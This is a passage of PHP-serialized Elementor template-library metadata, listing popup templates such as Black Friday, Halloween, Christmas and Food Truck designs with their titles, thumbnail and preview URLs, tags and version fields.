Chef\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Menu.jpg\";s:12:\"tmpl_created\";i:1647798194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-menu-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:82;a:21:{s:4:\"tmpl\";i:1365;s:2:\"id\";i:23244;s:5:\"title\";s:29:\"Classic | CTA | Personal Chef\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647798297;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Booking\",\"Chef\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:83;a:21:{s:4:\"tmpl\";i:1366;s:2:\"id\";i:23254;s:5:\"title\";s:31:\"Full Screen | Menu | Food Truck\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small-1.jpg\";s:12:\"tmpl_created\";i:1647798447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:84;a:21:{s:4:\"tmpl\";i:1367;s:2:\"id\";i:23265;s:5:\"title\";s:30:\"Fly-In | Discount | Food Truck\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small.jpg\";s:12:\"tmpl_created\";i:1647798657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:85;a:21:{s:4:\"tmpl\";i:1369;s:2:\"id\";i:23323;s:5:\"title\";s:28:\"Classic | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-6-Small.jpg\";s:12:\"tmpl_created\";i:1647855505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:86;a:21:{s:4:\"tmpl\";i:1370;s:2:\"id\";i:23329;s:5:\"title\";s:29:\"Slide-In | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-5-Small.jpg\";s:12:\"tmpl_created\";i:1647855865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:87;a:21:{s:4:\"tmpl\";i:1371;s:2:\"id\";i:23335;s:5:\"title\";s:31:\"Slide-In | CTA | Black Friday 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-1-Small.jpg\";s:12:\"tmpl_created\";i:1647856357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-cta-black-friday-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:88;a:21:{s:4:\"tmpl\";i:1372;s:2:\"id\";i:23341;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-3-Small.jpg\";s:12:\"tmpl_created\";i:1647856493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:89;a:21:{s:4:\"tmpl\";i:1373;s:2:\"id\";i:23347;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-2-Small.jpg\";s:12:\"tmpl_created\";i:1647856891;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:90;a:21:{s:4:\"tmpl\";i:1374;s:2:\"id\";i:23354;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 4\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-4-Small.jpg\";s:12:\"tmpl_created\";i:1647856996;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:91;a:21:{s:4:\"tmpl\";i:1375;s:2:\"id\";i:23394;s:5:\"title\";s:27:\"Classic | CTA | Halloween 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-3-Small.jpg\";s:12:\"tmpl_created\";i:1647857351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-halloween-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:31:\"[\"cta\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:92;a:21:{s:4:\"tmpl\";i:1376;s:2:\"id\";i:23401;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-2-Small.jpg\";s:12:\"tmpl_created\";i:1647857567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:93;a:21:{s:4:\"tmpl\";i:1377;s:2:\"id\";i:23407;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-1-Small.jpg\";s:12:\"tmpl_created\";i:1647857814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:94;a:21:{s:4:\"tmpl\";i:1378;s:2:\"id\";i:23416;s:5:\"title\";s:31:\"Fly-In | Discount | Halloween 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-5-Small.jpg\";s:12:\"tmpl_created\";i:1647858024;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-discount-halloween-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:44:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:95;a:21:{s:4:\"tmpl\";i:1379;s:2:\"id\";i:23422;s:5:\"title\";s:36:\"Classic | Subscription | Halloween 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-4-Small.jpg\";s:12:\"tmpl_created\";i:1647858246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-halloween-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:48:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:96;a:21:{s:4:\"tmpl\";i:1380;s:2:\"id\";i:23471;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-2-Small.jpg\";s:12:\"tmpl_created\";i:1647859193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:97;a:21:{s:4:\"tmpl\";i:1381;s:2:\"id\";i:23477;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-4-Small.jpg\";s:12:\"tmpl_created\";i:1647859838;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:98;a:21:{s:4:\"tmpl\";i:1382;s:2:\"id\";i:23483;s:5:\"title\";s:26:\"Fly-In | CTA | Christmas 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-1-Small.jpg\";s:12:\"tmpl_created\";i:1647860157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/fly-in-cta-christmas-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:99;a:21:{s:4:\"tmpl\";i:1383;s:2:\"id\";i:23489;s:5:\"title\";s:33:\"Slide-In | Discount | Christmas 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-5-Small.jpg\";s:12:\"tmpl_created\";i:1647860302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-christmas-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:100;a:21:{s:4:\"tmpl\";i:1384;s:2:\"id\";i:23496;s:5:\"title\";s:32:\"Classic | Discount | Christmas 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-3-Small.jpg\";s:12:\"tmpl_created\";i:1647860454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-christmas-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Christmas\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:101;a:21:{s:4:\"tmpl\";i:1385;s:2:\"id\";i:23523;s:5:\"title\";s:30:\"Classic | CTA | Valentines Day\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-2-Small.jpg\";s:12:\"tmpl_created\";i:1647860912;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-valentines-day/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:102;a:21:{s:4:\"tmpl\";i:1386;s:2:\"id\";i:23529;s:5:\"title\";s:39:\"Hello Bar | Discount | Valentines Day 2\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-1-Small.jpg\";s:12:\"tmpl_created\";i:1647861064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-discount-valentines-day-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:30:\"[\"Discount\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:103;a:21:{s:4:\"tmpl\";i:1387;s:2:\"id\";i:23536;s:5:\"title\";s:32:\"Classic | CTA | Valentines Day 3\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-3-Small.jpg\";s:12:\"tmpl_created\";i:1647861536;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-cta-valentines-day-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:104;a:21:{s:4:\"tmpl\";i:1388;s:2:\"id\";i:23586;s:5:\"title\";s:51:\"Fly-In | Subscribe | Health &#038; Wellness Company\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/35-Subscribe-Health-Wellness-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647862008;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscribe-health-wellness-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"Business\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:105;a:21:{s:4:\"tmpl\";i:1389;s:2:\"id\";i:23592;s:5:\"title\";s:34:\"Classic | Subscribe | Tech Company\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/36-Subscribe-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647866706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-subscribe-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:106;a:21:{s:4:\"tmpl\";i:1390;s:2:\"id\";i:23598;s:5:\"title\";s:36:\"Classic | Contact Us | Fight Classes\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/37-Contact-Us-Fight-Classes-Small.jpg\";s:12:\"tmpl_created\";i:1647866869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-contact-us-fight-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:107;a:21:{s:4:\"tmpl\";i:1391;s:2:\"id\";i:23611;s:5:\"title\";s:31:\"Classic | CTA | Mochi Shop 